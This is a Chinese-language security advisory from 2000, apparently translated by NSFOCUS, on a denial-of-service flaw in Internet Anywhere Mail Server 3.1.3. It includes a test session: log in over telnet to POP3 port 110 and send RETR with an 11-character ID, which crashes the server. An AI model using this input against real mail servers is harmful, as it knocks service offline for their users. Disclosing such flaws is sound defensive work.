安全研究
安全漏洞
Internet Anywhere邮件服务器RETR拒绝服务
发布日期:2000-02-11
更新日期:2000-02-11
受影响系统:True North Software Internet Anywhere Mail Server 3.1.3
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
描述:
在提交一个RETR命令命令时,如果其消息标识参数大于10个字符长度会造成Internet Anywhere邮件服务器崩溃。Doctor Watson将报告MailServer.exe访问出错的信息。重新启动后,邮件服务器将恢复其功能。
这个拒绝服务攻击不影响其他运行的程序,且要求攻击者在此pop3服务器上具有合法的帐号和口令。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
telnet target 110
+OK POP3 Welcome to someco.com using the Internet Anywhere Mail Server Version:3.1.3. Build:
1065 by True North Software, Inc. <184.4675258510890593303@someco.com>
user username
+OK valid
pass password
+OK Authorized
RETR 11111111111
建议:
暂无。
浏览次数:6906
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
